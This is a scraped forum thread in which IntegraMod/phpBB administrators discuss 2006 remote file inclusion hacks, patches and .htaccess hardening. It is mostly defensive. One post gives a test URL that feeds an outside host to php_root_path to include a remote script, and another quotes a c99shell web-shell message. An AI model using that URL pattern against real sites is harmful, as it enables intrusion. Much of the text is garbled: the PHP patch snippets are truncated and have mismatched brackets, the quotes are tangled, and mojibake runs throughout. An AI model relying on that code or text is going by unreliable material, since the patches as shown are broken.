Moderator: Integra Moderator
Open]) || (int)isset($HTTP_GET_VARS[STYLE_URL]) ) { (int)$style = urldecode( (isset($HTTP_POST_VARS[STYLE_URL])) ? $HTTP_POST_VARS[STYLE_URL] ] ); if($style == 0) { die('Hacking attempt'); exit; } if ( $theme = setup_style((int)$style) ) { setcookie($board_config['cookie_name'] . '_style', $style, time() + 31536000, $board_config['cookie_path'], $board_config['cookie_domain'], $board_config['cookie_secure']); return; } } if ( isset($HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']) ) { $style = $HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']; if ( $theme = setup_style((int)$style) ) { return; } }// Security update 02 September 2006 B ends //
"Fubie";p="14490" wrote:BMD,
Another thing. Change the name of your forum while doing the upload. If your forum directory is forum change it to pleasework, Then after every file is uploaded change the directory name to forum.
"Vadar";p="14537" wrote:OK, I'm the ultimate novice on php, but I'm having the same problem that Twitchy described in the ACP under the Photo Album section. I went back in and verified that I had all of the latest fixes as per the second post installed (Rev 5).
While doing that I noticed something that looked strange to me. For the fix labled function_portal.php 1 fix Rev 05 I notice that it shows: die("Hacking attempt");
For the other fixes, Hacking attempt is in single quotes vice double quotes, like this:
die('Hacking attempt');
Is that right?
For Michaelo, here is what I get when I hover my cursor over the ACP - Photo Album - CLowN SP Config link: http://www.navyjrotc.us/portal/admin/ad ... 149ade22d2
"Michaelo";p="14539" wrote:One of us is confused...
Before you can upload a file you either need ftp access or as a member you upload a file of allowed types (.gif, .png etc.).
There is no other way for a hacker to put a file on a server assuming they havent hack another site on the server in which case they may be able to cross contaminateà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦
agreedTo hack a site first you need a way in, to accomplish this you need to find a vulnerable point an exploit it, as with the recent hacks. The hackers used a remote file/script via the php_root_path weakness to execute a remote script allowing them accessà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ Once they gained access they proceeded to either upload files to gain control of the site or, as in most cases simply used a remote script hack tool to do thisà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦
I have examined the possibility of restricting upload directories to only accept certain file such as images or zips in an effort to counter the cross contamination problemà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦ more later on thisà¢Ãƒ ¢Ã¢â‚¬Å¡Ã‚ ¬Ãƒâ€šÃ‚ ¦
<Directory> # Allow access to the root of the hosting folder Options None AllowOverride None Order allow,deny Allow from all <FilesMatch> # But only to files with the specified extentions Order allow,deny Deny from all </FilesMatch> <FilesMatch> Order allow,deny Allow from all </FilesMatch></Directory>
"Michaelo";p="14544" wrote:computerz, You as admin determine what can be uploaded it's in the ACP allow upload file type or something like that.
Thats good to knowyou cannot send any type of command via the address...
will most certainly!Play around with this little htaccess info and see how it goes...
- Code: Select all
<Directory> # Allow access to the root of the hosting folder Options None AllowOverride None Order allow,deny Allow from all <FilesMatch> # But only to files with the specified extentions Order allow,deny Deny from all </FilesMatch> <FilesMatch> Order allow,deny Allow from all </FilesMatch></Directory>
"ihammo";p="14568" wrote:Now I am confused
I applied all the fixes as per Rev 5 and thought I would try the exploit on my site to see if it worked.
So, i popped http://my site/portal/includes/functions.php?php_root_path=http://www.testing123.com/test.html in to a browser and I did not get a "hacking attempt" message.
has anyone else tried this on their own site to see what happens? Until I can fix this I have taken my site offline completely
<phpphpinfo>
"ihammo";p="14588" wrote:When Register_Globals was OFF I got the exact same response as you Soloman.
I added some extra code to the hacking code to display the root path that was being used and no matter what I did whilst Register_Globals was OFF I couldn't pass anything to functions.php via the URL.
However, when Register_Globals was ON, I would get the "hacking attempt. Details Logged" message when testing the URL
I take it you do have direct contol over the Register_Globals variable on your server and did check that it was ON or OFF? I created a simple php file with the code
- Code: Select all
<phpphpinfo>
which I then navigated to in my browser to check that the Register_Variable had indeed changed. I run apache under windows on my test server and had to restart apache after changing the php.ini file (which needs to be in your windows directory I think - or apache does not seem to see it [but that could be my crappy set up of apache <img> ])
php_value register_globals 0
"tekguru";p="14605" wrote:Only one question though, how can we effect a style change without the functionality in there?
We use a 'Mobile' theme which a fair number of our users need to use and since adding the fixes in we are of course unable to change the style?
Hello everybody first of all thanks to you all, for treating this subject and got everybody involved, as i posted previously i had my website hacked couple a days ago, this is the very first time it happened to me, i had websites for over 13 years now, i must admit i was a bit shocked, when i discovered that all my db was wiped out. so my question is if we discuss here on this forum, about hacking etc.. and first of all it's sad to use this term "hacking" for these idiots whom are enjoying themselves to destroying, cause a real hacker builds doesn't destroy, if we discuss here and we are given security patches etc.. how can we make sure that the hackers are not actually members here, so they get the answers too, which means they can find ways aroud these security patches, ]
The problem is, you can't really tell if you have a hacker here lurking and analyzing the code or whatever, but the devs always try to create a package without big gaping holes in the first place. Since thats nearly impossible, the only real defense we have is having guys like the devs here who are quick to identify and patch holes. Also the community here is always trying to help the devs out, so that makes thier life a little easier.
[code] (i also noticed that any integramod site i went to visit including mine, i found them very very slow they drag) i use 10MB connexion and still as if i am using a dial up when i am surfing sites "Integramod" is it me or is it a fact? i don't have problems with other sites except integramod, not even with phpbb boards.[/code]
Integramod is big with lots of mods. Alot of times a faster host like mine can take some of the sluggishness out, but the fact still remains, IM is really big with lots of features. As the development goes on, I am sure they are taking load times and number of queries into consideration and looking for ways to reduce them. If you take a vanilla phpBB and mod the hell out of it, you'll get the same effect. As the number of queries increase, so does the load on the processor and as a result, the speed starts to suffer. Problem is, when you start changing code to adjust one thing, it has an effect on many other things, so it's a delicate process tinkering with it
[code]i am rebuilding my new site, downloaded Integramod 140, running phpBB 2.0.17, is there a way to upgrade to the new versions straight from phpBB 2.0.17 to phpBB 2.0.21?[/code]
Nope.. .17 -> .19 security patch 1.0.2 -> 1.0.3 -> .20 -> .21 .... in that order
[code]i always get this message "Your Daily Database Backup Failed"how can i fix this please, because it's mainly security updates?[/code]
One of the updates fixes that.. not sure which one
[code]Please help, i don't want to go through this again, it took me almost a year to get my site finally looks like a real website, and this ***** destroyed it in few minutes or hours. I know that who ever hacked my site used an sql injection, how can we protect ourselves against such attacks please? and finally i read about "register globals being on or off" where exactly do i need to turn it on and off?Thank you all for your hard work!!
"adbasque";p="14756" wrote:Please help, i don't want to go through this again, it took me almost a year to get my site finally looks like a real website, and this ***** destroyed it in few minutes or hours.
"adbasque";p="14756" wrote:I know that who ever hacked my site used an sql injection, how can we protect ourselves against such attacks please? and finally i read about "register globals being on or off" where exactly do i need to turn it on and off?
Thank you all for your hard work!!
Attention! SQL-Manager is NOT ready module! Don't reports bugs.
But, you can't connect to forum sql-base, because db-software="".$dbms."" is not supported by c99shell. Please, report us for fix.
If you think, it is mistake, please send us url and dump of $GLOBALS.
I have looked at some hackers scripts...
SQL injection is something they are working on...
Their scripts are already testing this, but it's not fully supported yet.
Yes, they have support for this too
Attacks come from Script-Kiddies who don't know much about coding themselves, they just use prepared scripts and have support for these things as well...
Open]) || (int)isset($HTTP_GET_VARS[STYLE_URL]) ) { (int)$style = urldecode( (isset($HTTP_POST_VARS[STYLE_URL])) ? $HTTP_POST_VARS[STYLE_URL] ] ); if($style == 0) { die('Hacking attempt'); exit; } if ( $theme = setup_style((int)$style) ) { setcookie($board_config['cookie_name'] . '_style', $style, time() + 31536000, $board_config['cookie_path'], $board_config['cookie_domain'], $board_config['cookie_secure']); return; } } if ( isset($HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']) ) { $style = $HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']; if ( $theme = setup_style((int)$style) ) { return; } }
Open]
functions_mods_settings 1 fix [color=red]Rev 05[/color]
[code] Open]
[color=green]If you have been hacked, remove all unknown files, change you passwords for main admin, admins and moderators and upload files again from original source making sure the above fixes are added.[/color]
I am aware that people may have the above files with 2.0.21 updates installed so I am not attaching updates as my files probably wont match everyones...
Mike
[color=red]Updated]Rev 006[/b][/color][/quote]
[code]Find]) || (int)isset($HTTP_GET_VARS[STYLE_URL]) ) { (int)$style = urldecode( (isset($HTTP_POST_VARS[STYLE_URL])) ? $HTTP_POST_VARS[STYLE_URL] : (int)$HTTP_GET_VARS[STYLE_URL] ); if($style == 0 || $style > 49) { die('Hacking attempt'); exit; } if ( $theme = setup_style($style) ) { setcookie($board_config['cookie_name'] . '_style', $style, time() + 31536000, $board_config['cookie_path'], $board_config['cookie_domain'], $board_config['cookie_secure']); return; } } if ( isset($HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']) ) { $style = $HTTP_COOKIE_VARS[$board_config['cookie_name'] . '_style']; if ( $theme = setup_style($style) ) { return; } }
"sasan";p="14807" wrote:hi my friend i test your site and i most say your site have a buge!
Warning: main(./includes/functions_categories_hierarchy.): failed to open stream: No such file or directory in /home/windows/public_html/includes/functions.php on line 37
Warning: main(): Failed opening './includes/functions_categories_hierarchy.' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/windows/public_html/includes/functions.php on line 37
if register global is on your site no hacking!! pleas fix this bug on your forum thx sasan
includes/functions_categories_hierarchy
"Michaelo";p="14814" wrote:I will redo this post to clarify what I intended but basically the code at the bottom goes between the
// BEGIN Style Select MOD
(all code between these comments)
// END Style Select MOD
comments ie replace this: (all code between these comments) with the code at the bottom...
Mike
and finally i read about "register globals being on or off" where exactly do i need to turn it on and off?
I'll let Michaelo answer that one.. I dont remember.. I think it's a statement in the .htaccess?
"Michaelo";p="14806" wrote:Confirm the functions.php edit are as per 2nd post here (second edit in functions.php)...
"adbasque";p="14832" wrote:i know you can deny or allow certains things but i am not sure if you can turn on and off the register_globals.
php_value register_globals 0
if ( !defined('IN_PHPBB') ){ die ("Hacking attempt!");}
# set register globals off php_value register_globals 0 # set allow_url_fopen off php_value allow_url_fopen 0 # set magic_quotes_gpc off php_value magic_quotes_gpc 0 # set magic_quotes_runtime off php_value magic_quotes_runtime 0
"honie";p="14921" wrote:I have tried the updates on a fresh funtions.php 3 times and it still goes white. Before applying the fix I no longer have the left side links in the ACP and am unable to view any posts at all.
"Rabi";p="14940" wrote:"honie";p="14921" wrote:I have tried the updates on a fresh funtions.php 3 times and it still goes white. Before applying the fix I no longer have the left side links in the ACP and am unable to view any posts at all.
Find];
"Drop-Forged";p="14891" wrote:...I found a page that seemed to have some good advise for making php more secure with .htaccess.
RewriteEngine onRewriteRule phpbb_root_path hacker_trying_again [L]
RewriteRule (.*)phpbb_root_path(.*) /hacking_attempt.cgi?first=$1&last=$2
"macarlisle";p="15068" wrote:Hey guys, I have just added the lines of code and I'm now getting this issue.
Parse error: syntax error, unexpected ':' in /home/westtexas/www/www/phpBB2/includes/functions.php on line 29
Any clues?
"macarlisle";p="15074" wrote:Sorry about that, I didnt pay attiontion to entire line of code.
Registered users: App360MonitorBot, Bing [Bot]